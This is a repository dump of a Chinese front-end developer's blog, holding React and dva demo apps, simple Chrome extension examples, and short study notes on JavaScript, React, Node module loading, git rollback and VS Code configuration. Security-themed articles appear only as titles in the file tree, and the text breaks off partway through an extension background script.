├── .gitignore
├── examples
    ├── react-redux-test
    │   ├── mock
    │   │   └── .gitkeep
    │   ├── .webpackrc
    │   ├── .eslintrc
    │   ├── .roadhogrc.mock.js
    │   ├── src
    │   │   ├── index.css
    │   │   ├── assets
    │   │   │   └── yay.jpg
    │   │   ├── services
    │   │   │   └── example.js
    │   │   ├── components
    │   │   │   └── Example.js
    │   │   ├── index.js
    │   │   ├── router.js
    │   │   ├── models
    │   │   │   └── example.js
    │   │   ├── routes
    │   │   │   ├── Count.js
    │   │   │   ├── IndexPage.css
    │   │   │   └── IndexPage.js
    │   │   └── utils
    │   │   │   └── request.js
    │   ├── .gitignore
    │   ├── .editorconfig
    │   ├── public
    │   │   └── index.html
    │   └── package.json
    ├── chrome-extension
    │   ├── icon.png
    │   ├── manifest.json
    │   ├── js
    │   │   ├── content.js
    │   │   └── popup.js
    │   └── popup.html
    ├── chrome-plugin-demo-master
    │   ├── demo
    │   │   ├── img
    │   │   │   ├── icon.png
    │   │   │   └── sds.png
    │   │   ├── _locales
    │   │   │   ├── zh_CN
    │   │   │   │   └── messages.json
    │   │   │   └── en
    │   │   │   │   └── messages.json
    │   │   ├── devtools.html
    │   │   ├── js
    │   │   │   ├── show-image-content-size.js
    │   │   │   ├── devtools.js
    │   │   │   ├── inject.js
    │   │   │   ├── options.js
    │   │   │   ├── mypanel.js
    │   │   │   ├── background.js
    │   │   │   ├── content-script.js
    │   │   │   └── popup.js
    │   │   ├── sidebar.html
    │   │   ├── background.html
    │   │   ├── newtab.html
    │   │   ├── options.html
    │   │   ├── mypanel.html
    │   │   ├── css
    │   │   │   └── custom.css
    │   │   ├── popup.html
    │   │   └── manifest.json
    │   └── page-action-demo
    │   │   ├── img
    │   │       └── icon.png
    │   │   ├── popup.html
    │   │   ├── js
    │   │       └── background.js
    │   │   └── manifest.json
    └── BaiduAdBlock-master
    │   └── BaiduAdBlock
    │       ├── images
    │           ├── icon16.png
    │           └── icon48.png
    │       ├── scripts
    │           ├── background.js
    │           └── content.js
    │       ├── index.html
    │       └── manifest.json
├── imgs
    ├── dep1.png
    ├── dep2.png
    ├── webs
    │   ├── p
    │   ├── ckxt.png
    │   ├── h5.jpg
    │   ├── pm.jpg
    │   ├── web1.png
    │   ├── webs.jpg
    │   ├── wy.gif
    │   ├── arch-1.gif
    │   ├── arch-2.gif
    │   ├── arch-3.gif
    │   ├── fenli.png
    │   ├── nodejs.png
    │   ├── web2.JPEG
    │   ├── web3.JPEG
    │   ├── arch-cs.gif
    │   ├── browser.png
    │   ├── jineng1.PNG
    │   ├── jineng2.JPEG
    │   ├── jineng3.JPEG
    │   ├── javascript.jpg
    │   ├── xiaochengxu.jpg
    │   └── xiaochengxu.png
    ├── 事件.png
    ├── 事件.xmind
    ├── anquan.png
    ├── event.png
    ├── logjs.png
    ├── popup.png
    ├── yewai.jpeg
    ├── anquan
    │   ├── bg.jpg
    │   ├── fb.jpg
    │   ├── huazhu.jpg
    │   └── 20161111165019365
    ├── anquan1.png
    ├── choujiang.png
    ├── console.png
    ├── reactDom.png
    ├── setState.png
    ├── xiaodao.jpeg
    ├── animation1.gif
    ├── animation2.gif
    ├── breakPoint.png
    ├── fiber-tree.png
    └── setState.xmind
├── reactDom.xmind
├── src
    ├── npm木马.pptx
    ├── 大前端简介.pptx
    ├── 你不知道的js-上册.md
    ├── 前端面试题精选.md
    ├── react和vue对比.md
    ├── git回滚.md
    ├── nodejs加载机制.md
    ├── vscode路径别名问题.md
    ├── BFC.md
    ├── react16-setState流程.md
    ├── 黑科技-react如何获取父元素.md
    ├── js编写动画的方式.md
    ├── 黑科技-react如何从dom上获取fiber实例.md
    ├── 图片串行加载.md
    ├── redux插件原理详解.md
    ├── react16-事件系统分析.md
    ├── react源码分析-reactDom.render.md
    ├── 我是如何从你的网站盗取银行卡和密码的.md
    ├── 如何开发chrome-extension.md
    ├── 大前端简介.md
    ├── 如何阻止我从您的网站收集信用卡号码和密码.md
    └── 自问自答.md
├── react-test
    ├── src
    │   ├── index.css
    │   ├── index.js
    │   ├── App.test.js
    │   ├── App.js
    │   ├── App.css
    │   ├── logo.svg
    │   └── registerServiceWorker.js
    ├── public
    │   ├── favicon.ico
    │   ├── manifest.json
    │   └── index.html
    ├── .gitignore
    └── package.json
├── package.json
├── event-loop.md
├── README.md
└── the-super-tiny-compiler.js


/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules


--------------------------------------------------------------------------------
/examples/react-redux-test/mock/.gitkeep:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/examples/react-redux-test/.webpackrc:
--------------------------------------------------------------------------------
1 | {
2 | }
3 | 


--------------------------------------------------------------------------------
/examples/react-redux-test/.eslintrc:
--------------------------------------------------------------------------------
1 | {
2 |   "extends": "umi"
3 | }
4 | 


--------------------------------------------------------------------------------
/examples/react-redux-test/.roadhogrc.mock.js:
--------------------------------------------------------------------------------
1 | 
2 | export default {
3 | };
4 | 


--------------------------------------------------------------------------------
/imgs/dep1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/dep1.png


--------------------------------------------------------------------------------
/imgs/dep2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/dep2.png


--------------------------------------------------------------------------------
/imgs/webs/p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/p


--------------------------------------------------------------------------------
/imgs/事件.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/事件.png


--------------------------------------------------------------------------------
/imgs/事件.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/事件.xmind


--------------------------------------------------------------------------------
/imgs/anquan.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/anquan.png


--------------------------------------------------------------------------------
/imgs/event.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/event.png


--------------------------------------------------------------------------------
/imgs/logjs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/logjs.png


--------------------------------------------------------------------------------
/imgs/popup.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/popup.png


--------------------------------------------------------------------------------
/imgs/yewai.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/yewai.jpeg


--------------------------------------------------------------------------------
/reactDom.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/reactDom.xmind


--------------------------------------------------------------------------------
/src/npm木马.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/src/npm木马.pptx


--------------------------------------------------------------------------------
/src/大前端简介.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/src/大前端简介.pptx


--------------------------------------------------------------------------------
/imgs/anquan/bg.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/anquan/bg.jpg


--------------------------------------------------------------------------------
/imgs/anquan/fb.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/anquan/fb.jpg


--------------------------------------------------------------------------------
/imgs/anquan1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/anquan1.png


--------------------------------------------------------------------------------
/imgs/choujiang.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/choujiang.png


--------------------------------------------------------------------------------
/imgs/console.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/console.png


--------------------------------------------------------------------------------
/imgs/reactDom.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/reactDom.png


--------------------------------------------------------------------------------
/imgs/setState.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/setState.png


--------------------------------------------------------------------------------
/imgs/webs/ckxt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/ckxt.png


--------------------------------------------------------------------------------
/imgs/webs/h5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/h5.jpg


--------------------------------------------------------------------------------
/imgs/webs/pm.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/pm.jpg


--------------------------------------------------------------------------------
/imgs/webs/web1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/web1.png


--------------------------------------------------------------------------------
/imgs/webs/webs.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/webs.jpg


--------------------------------------------------------------------------------
/imgs/webs/wy.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/wy.gif


--------------------------------------------------------------------------------
/imgs/xiaodao.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/xiaodao.jpeg


--------------------------------------------------------------------------------
/imgs/animation1.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/animation1.gif


--------------------------------------------------------------------------------
/imgs/animation2.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/animation2.gif


--------------------------------------------------------------------------------
/imgs/breakPoint.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/breakPoint.png


--------------------------------------------------------------------------------
/imgs/fiber-tree.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/fiber-tree.png


--------------------------------------------------------------------------------
/imgs/setState.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/setState.xmind


--------------------------------------------------------------------------------
/imgs/webs/arch-1.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/arch-1.gif


--------------------------------------------------------------------------------
/imgs/webs/arch-2.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/arch-2.gif


--------------------------------------------------------------------------------
/imgs/webs/arch-3.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/arch-3.gif


--------------------------------------------------------------------------------
/imgs/webs/fenli.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/fenli.png


--------------------------------------------------------------------------------
/imgs/webs/nodejs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/nodejs.png


--------------------------------------------------------------------------------
/imgs/webs/web2.JPEG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/web2.JPEG


--------------------------------------------------------------------------------
/imgs/webs/web3.JPEG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/web3.JPEG


--------------------------------------------------------------------------------
/imgs/anquan/huazhu.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/anquan/huazhu.jpg


--------------------------------------------------------------------------------
/imgs/webs/arch-cs.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/arch-cs.gif


--------------------------------------------------------------------------------
/imgs/webs/browser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/browser.png


--------------------------------------------------------------------------------
/imgs/webs/jineng1.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/jineng1.PNG


--------------------------------------------------------------------------------
/imgs/webs/jineng2.JPEG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/jineng2.JPEG


--------------------------------------------------------------------------------
/imgs/webs/jineng3.JPEG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/jineng3.JPEG


--------------------------------------------------------------------------------
/imgs/webs/javascript.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/javascript.jpg


--------------------------------------------------------------------------------
/imgs/webs/xiaochengxu.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/xiaochengxu.jpg


--------------------------------------------------------------------------------
/imgs/webs/xiaochengxu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/webs/xiaochengxu.png


--------------------------------------------------------------------------------
/examples/react-redux-test/src/index.css:
--------------------------------------------------------------------------------
1 | 
2 | html, body, :global(#root) {
3 |   height: 100%;
4 | }
5 | 
6 | 


--------------------------------------------------------------------------------
/react-test/src/index.css:
--------------------------------------------------------------------------------
1 | body {
2 |   margin: 0;
3 |   padding: 0;
4 |   font-family: sans-serif;
5 | }
6 | 


--------------------------------------------------------------------------------
/imgs/anquan/20161111165019365:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/imgs/anquan/20161111165019365


--------------------------------------------------------------------------------
/react-test/public/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/react-test/public/favicon.ico


--------------------------------------------------------------------------------
/examples/chrome-extension/icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/examples/chrome-extension/icon.png


--------------------------------------------------------------------------------
/examples/react-redux-test/src/assets/yay.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/examples/react-redux-test/src/assets/yay.jpg


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/img/icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/examples/chrome-plugin-demo-master/demo/img/icon.png


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/img/sds.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/examples/chrome-plugin-demo-master/demo/img/sds.png


--------------------------------------------------------------------------------
/examples/BaiduAdBlock-master/BaiduAdBlock/images/icon16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/examples/BaiduAdBlock-master/BaiduAdBlock/images/icon16.png


--------------------------------------------------------------------------------
/examples/BaiduAdBlock-master/BaiduAdBlock/images/icon48.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/examples/BaiduAdBlock-master/BaiduAdBlock/images/icon48.png


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/_locales/zh_CN/messages.json:
--------------------------------------------------------------------------------
1 | {
2 | 	"pluginDesc": {"message": "一个简单的Chrome插件demo"},
3 | 	"helloWorld": {"message": "你好啊，世界！"}
4 | }


--------------------------------------------------------------------------------
/examples/react-redux-test/src/services/example.js:
--------------------------------------------------------------------------------
1 | import request from '../utils/request';
2 | 
3 | export function query() {
4 |   return request('/api/users');
5 | }
6 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/page-action-demo/img/icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/luke93h/git-blog/HEAD/examples/chrome-plugin-demo-master/page-action-demo/img/icon.png


--------------------------------------------------------------------------------
/src/你不知道的js-上册.md:
--------------------------------------------------------------------------------
 1 | # 你不知道德js-上册-读书笔记
 2 | 
 3 | ## 目录
 4 | - [第一章、作用域是什么](#作用域)
 5 | 
 6 | ## 作用域
 7 | js在执行前会经历三个步骤：
 8 | 1. 词法分析：将字符串拆分为词法单元；
 9 | 2. 语法分析：由词法单元生成抽象语法树
10 | 3. 代码生成


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/_locales/en/messages.json:
--------------------------------------------------------------------------------
1 | {
2 | 	"pluginDesc": {"message": "A simple chrome extension demo"},
3 | 	"helloWorld": {"message": "Hello World!"}
4 | }


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/devtools.html:
--------------------------------------------------------------------------------
1 | <!DOCTYPE html>
2 | <html>
3 | <head></head>
4 | <body>
5 | 	<script type="text/javascript" src="js/devtools.js"></script>
6 | </body>
7 | </html>


--------------------------------------------------------------------------------
/examples/react-redux-test/.gitignore:
--------------------------------------------------------------------------------
 1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files.
 2 | 
 3 | # dependencies
 4 | /node_modules
 5 | 
 6 | # production
 7 | /dist
 8 | 
 9 | # misc
10 | .DS_Store
11 | npm-debug.log*
12 | 


--------------------------------------------------------------------------------
/examples/react-redux-test/src/components/Example.js:
--------------------------------------------------------------------------------
 1 | import React from 'react';
 2 | 
 3 | const Example = () => {
 4 |   return (
 5 |     <div>
 6 |       Example
 7 |     </div>
 8 |   );
 9 | };
10 | 
11 | Example.propTypes = {
12 | };
13 | 
14 | export default Example;
15 | 


--------------------------------------------------------------------------------
/react-test/src/index.js:
--------------------------------------------------------------------------------
1 | import React from 'react';
2 | import ReactDOM from 'react-dom';
3 | import './index.css';
4 | import App from './App';
5 | import registerServiceWorker from './registerServiceWorker';
6 | 
7 | ReactDOM.render(<App />, document.getElementById('root'));
8 | registerServiceWorker();
9 | 


--------------------------------------------------------------------------------
/react-test/src/App.test.js:
--------------------------------------------------------------------------------
 1 | import React from 'react';
 2 | import ReactDOM from 'react-dom';
 3 | import App from './App';
 4 | 
 5 | it('renders without crashing', () => {
 6 |   const div = document.createElement('div');
 7 |   ReactDOM.render(<App />, div);
 8 |   ReactDOM.unmountComponentAtNode(div);
 9 | });
10 | 


--------------------------------------------------------------------------------
/src/前端面试题精选.md:
--------------------------------------------------------------------------------
 1 | # 前端面试题精选
 2 | 
 3 | 该文章用于记录，比较好的面试题，并尝试给出最佳答案
 4 | 
 5 | ### 怎么去设计一个组件封装
 6 | 
 7 | 组件封装的目的是为了更好的复用，提高工作效率，设计一个优秀的组件可以从以下几方面考虑:
 8 | 1. 单元测试。单元测试是用来对一个模块、一个函数或者一个类来进行正确性检验的测试工作。
 9 | 
10 | * 从短期来看，单元测试会导致工作量大幅增加，降低开发效率；长期来看单元测试有利于项目的维护，升级，重构；
11 | * 使用频率高的模块，核心模块，开源组件应该写单元测试
12 | 
13 | 2. 解耦。解耦是为了更加广阔的
14 | 
15 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/js/show-image-content-size.js:
--------------------------------------------------------------------------------
1 | // 鉴于浏览器默认不会显示图片的体积大小，每次都需要保存到本地才能查看到大小
2 | // 故通过插件的方式强行修改图片页的标题
3 | fetch(location.href).then(resp => resp.blob()).then(blob => {
4 | 	var size = blob.size;
5 | 	size = (size / 1024).toFixed(2) + ' kb';
6 | 	document.title = '(' + size + ')' + document.title;
7 | 	console.log(size);
8 | });
9 | 


--------------------------------------------------------------------------------
/examples/react-redux-test/.editorconfig:
--------------------------------------------------------------------------------
 1 | # http://editorconfig.org
 2 | root = true
 3 | 
 4 | [*]
 5 | indent_style = space
 6 | indent_size = 2
 7 | end_of_line = lf
 8 | charset = utf-8
 9 | trim_trailing_whitespace = true
10 | insert_final_newline = true
11 | 
12 | [*.md]
13 | trim_trailing_whitespace = false
14 | 
15 | [Makefile]
16 | indent_style = tab
17 | 


--------------------------------------------------------------------------------
/examples/react-redux-test/src/index.js:
--------------------------------------------------------------------------------
 1 | import dva from 'dva';
 2 | import './index.css';
 3 | 
 4 | // 1. Initialize
 5 | const app = dva();
 6 | 
 7 | // 2. Plugins
 8 | // app.use({});
 9 | 
10 | // 3. Model
11 | app.model(require('./models/example').default);
12 | 
13 | // 4. Router
14 | app.router(require('./router').default);
15 | 
16 | // 5. Start
17 | app.start('#root');
18 | 


--------------------------------------------------------------------------------
/src/react和vue对比.md:
--------------------------------------------------------------------------------
 1 | Vue的优势是：
 2 |   1. 模板和渲染函数的弹性选择
 3 |   2. 简单的语法和项目配置
 4 |   3. 更快的渲染速度和更小的体积
 5 | 
 6 | React的优势是：
 7 |   1. 更适合大型应用和更好的可测试性
 8 |   2. Web端和移动端原生APP通吃
 9 |   3. 更大的生态系统，更多的支持和好用的工具
10 | 
11 | 共通的优点：
12 |   1. 用虚拟DOM实现快速渲染
13 |   2. 轻量级
14 |   3. 响应式组件
15 |   4. 服务端渲染
16 |   5. 集成路由工具，打包工具，状态管理工具的难度低
17 |   6. 优秀的支持和社区
18 | 
19 | 综上所述，vue适用于小公司（招人方便），小项目（开发快），react适合大型的复杂项目。


--------------------------------------------------------------------------------
/react-test/.gitignore:
--------------------------------------------------------------------------------
 1 | # See https://help.github.com/ignore-files/ for more about ignoring files.
 2 | 
 3 | # dependencies
 4 | /node_modules
 5 | 
 6 | # testing
 7 | /coverage
 8 | 
 9 | # production
10 | /build
11 | 
12 | # misc
13 | .DS_Store
14 | .env.local
15 | .env.development.local
16 | .env.test.local
17 | .env.production.local
18 | 
19 | npm-debug.log*
20 | yarn-debug.log*
21 | yarn-error.log*
22 | 


--------------------------------------------------------------------------------
/examples/react-redux-test/public/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |   <meta charset="UTF-8">
 5 |   <meta name="viewport" content="width=device-width, initial-scale=1">
 6 |   <title>Dva Demo</title>
 7 |   <link rel="stylesheet" href="index.css" />
 8 | </head>
 9 | <body>
10 | 
11 |   <div id="root"></div>
12 |   <script src="index.js"></script>
13 | 
14 | </body>
15 | </html>
16 | 


--------------------------------------------------------------------------------
/react-test/public/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "short_name": "React App",
 3 |   "name": "Create React App Sample",
 4 |   "icons": [
 5 |     {
 6 |       "src": "favicon.ico",
 7 |       "sizes": "64x64 32x32 24x24 16x16",
 8 |       "type": "image/x-icon"
 9 |     }
10 |   ],
11 |   "start_url": "./index.html",
12 |   "display": "standalone",
13 |   "theme_color": "#000000",
14 |   "background_color": "#ffffff"
15 | }
16 | 


--------------------------------------------------------------------------------
/src/git回滚.md:
--------------------------------------------------------------------------------
 1 | ## git回滚
 2 | 
 3 | 最近看到一个问题，虽然没遇到过使用场景，但觉得以后说不定能用上，此处记录一下。问题如下：
 4 | 
 5 | 如果线上代码出了问题，需要代码回滚到之前的某次提交，应该如何操作？
 6 | 
 7 | 方法一，revert：
 8 | ```bash
 9 | git revert HEAD
10 | git push origin master
11 | ```
12 | 
13 | 方法二，reset：
14 | ```bash
15 | git reset --hard HEAD^
16 | git push origin master -f
17 | ```
18 | 
19 | 方法三：回滚某次提交
20 | 
21 | ```bash
22 | # 找到要回滚的commitID
23 | git log
24 | git revert commitID
25 | ```


--------------------------------------------------------------------------------
/src/nodejs加载机制.md:
--------------------------------------------------------------------------------
 1 | 几种模块互用   nodejs加载机制   webpack HMR原理  几个加载器的实现    promise 顺序处理   js 序列化 http2  ant design 表单校验  react/vue 是如何转小程序的   面试了一天 除
 2 | 还有一个如何实现直播间几万弹幕发送  送礼物 互不影响啥的     乱七八糟的  根本没明白什么需求
 3 | 
 4 | nodejs模块引用机制
 5 | 
 6 | 在node中已入模块时，需要经历三个步骤：
 7 | 1. 路径分析
 8 | 2. 文件定位
 9 | 3. 编译执行
10 | 
11 | 模块分类：
12 | 1. 核心模块
13 | 2. 文件模块
14 | 
15 | 优先级：
16 | 
17 | 缓存模块 > 核心模块 > 用户模块
18 | 
19 | .js > .json > .node
20 | 
21 | 自定义模块的路径查找


--------------------------------------------------------------------------------
/react-test/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "react-test",
 3 |   "version": "0.1.0",
 4 |   "private": true,
 5 |   "dependencies": {
 6 |     "react": "^16.4.1",
 7 |     "react-dom": "^16.4.1",
 8 |     "react-scripts": "1.1.4"
 9 |   },
10 |   "scripts": {
11 |     "start": "react-scripts start",
12 |     "build": "react-scripts build",
13 |     "test": "react-scripts test --env=jsdom",
14 |     "eject": "react-scripts eject"
15 |   }
16 | }


--------------------------------------------------------------------------------
/examples/react-redux-test/src/router.js:
--------------------------------------------------------------------------------
 1 | import React from 'react';
 2 | import { Router, Route, Switch } from 'dva/router';
 3 | import IndexPage from './routes/IndexPage';
 4 | 
 5 | function RouterConfig({ history }) {
 6 |   return (
 7 |     <Router history={history}>
 8 |       <Switch>
 9 |         <Route path="/" exact component={IndexPage} />
10 |       </Switch>
11 |     </Router>
12 |   );
13 | }
14 | 
15 | export default RouterConfig;
16 | 


--------------------------------------------------------------------------------
/examples/react-redux-test/src/models/example.js:
--------------------------------------------------------------------------------
 1 | 
 2 | export default {
 3 | 
 4 |   namespace: 'example',
 5 | 
 6 |   state: {
 7 |     count: 0
 8 |   },
 9 | 
10 | 
11 |   effects: {
12 |     *fetch({ payload }, { call, put }) {  // eslint-disable-line
13 |       yield put({ type: 'save' });
14 |     },
15 |   },
16 | 
17 |   reducers: {
18 |     add(state, action) {
19 |       return { ...state, count: ++state.count};
20 |     },
21 |   },
22 | 
23 | };
24 | 


--------------------------------------------------------------------------------
/examples/react-redux-test/src/routes/Count.js:
--------------------------------------------------------------------------------
 1 | import React from 'react';
 2 | import { connect } from 'dva';
 3 | let i = 0
 4 | class Count extends React.Component {
 5 |   render(){
 6 |     console.log('from Count', ++i)
 7 |     return (
 8 |       <div>
 9 |         {this.props.example.count}
10 |         <br/>
11 |         {this.props.count}
12 |       </div>
13 |     );
14 |   }
15 | }
16 | 
17 | export default connect(state => ({
18 |   example: state.example
19 | }))(Count);


--------------------------------------------------------------------------------
/examples/BaiduAdBlock-master/BaiduAdBlock/scripts/background.js:
--------------------------------------------------------------------------------
 1 | chrome.runtime.onMessage.addListener(
 2 |     function (count, sender, sendResponse) {
 3 |         chrome.browserAction.setBadgeBackgroundColor({
 4 |             color: '#F00'
 5 |         });
 6 | 
 7 |         chrome.browserAction.setBadgeText({
 8 |             text: count.toString()
 9 |         });
10 | 
11 |         chrome.browserAction.setTitle({
12 |             title: '已为您清除' + count + '了条广告'
13 |         });
14 |     }
15 | );


--------------------------------------------------------------------------------
/src/vscode路径别名问题.md:
--------------------------------------------------------------------------------
 1 | ## vscode路径别名问题
 2 | 
 3 | 最近在开发时遇到了这样一个问题，vscode是有模块跳转的功能的（一般为ctrl+左击或alt+左击），但是在设置了webpack的路径别名之后这个功能失效了。
 4 | 
 5 | 网上查了资料后，找到了解决方式如下：
 6 | 
 7 | 1. 在项目根位置创建一个jsconfig.json
 8 | 2. 配置jsconfig.json
 9 | ```jsx
10 | {
11 |   "include": [
12 |     "./src/**/*"
13 |   ],
14 |   "compilerOptions": {
15 |     "baseUrl": ".",
16 |     "paths": {
17 |         "components/*": ["src/components/*"],
18 |         "utils": ["src/utils/utils.js"],
19 |     },
20 |   }
21 | }
22 | ```
23 | 3. 重启ide，搞定！


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/page-action-demo/popup.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<title>popup页</title>
 5 | 	<meta charset="utf-8"/>
 6 | 	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 7 | 	<style>
 8 | 	body {
 9 | 		font-family: 'Microsoft Yahei';
10 | 		width: 500px;
11 | 		min-height: 100px;
12 | 	}
13 | 	a {margin-right: 10px;}
14 | 	</style>
15 | </head>
16 | <body>
17 | 	<h1>pageAction演示</h1>
18 | 	<p>打开百度pageAction会点亮，打开其它页面pageAction会变灰。</p>
19 | </body>
20 | </html>


--------------------------------------------------------------------------------
/react-test/src/App.js:
--------------------------------------------------------------------------------
 1 | import React, { Component } from 'react';
 2 | import logo from './logo.svg';
 3 | import './App.css';
 4 | 
 5 | class App extends Component {
 6 |   state = {
 7 |     a: 1,
 8 |   }
 9 |   onClick = () => {
10 |     this.setState({
11 |       a: this.state.a + 1
12 |     })
13 |   }
14 |   render() {
15 |     return (
16 |       <div>
17 |         <div onClick={this.onClick}>
18 |           {this.state.a}
19 |         </div>
20 |       </div>
21 |     );
22 |   }
23 | }
24 | 
25 | export default App;
26 | 


--------------------------------------------------------------------------------
/react-test/src/App.css:
--------------------------------------------------------------------------------
 1 | .App {
 2 |   text-align: center;
 3 | }
 4 | 
 5 | .App-logo {
 6 |   animation: App-logo-spin infinite 20s linear;
 7 |   height: 80px;
 8 | }
 9 | 
10 | .App-header {
11 |   background-color: #222;
12 |   height: 150px;
13 |   padding: 20px;
14 |   color: white;
15 | }
16 | 
17 | .App-title {
18 |   font-size: 1.5em;
19 | }
20 | 
21 | .App-intro {
22 |   font-size: large;
23 | }
24 | 
25 | @keyframes App-logo-spin {
26 |   from { transform: rotate(0deg); }
27 |   to { transform: rotate(360deg); }
28 | }
29 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/page-action-demo/js/background.js:
--------------------------------------------------------------------------------
 1 | chrome.runtime.onInstalled.addListener(function(){
 2 | 	chrome.declarativeContent.onPageChanged.removeRules(undefined, function(){
 3 | 		chrome.declarativeContent.onPageChanged.addRules([
 4 | 			{
 5 | 				conditions: [
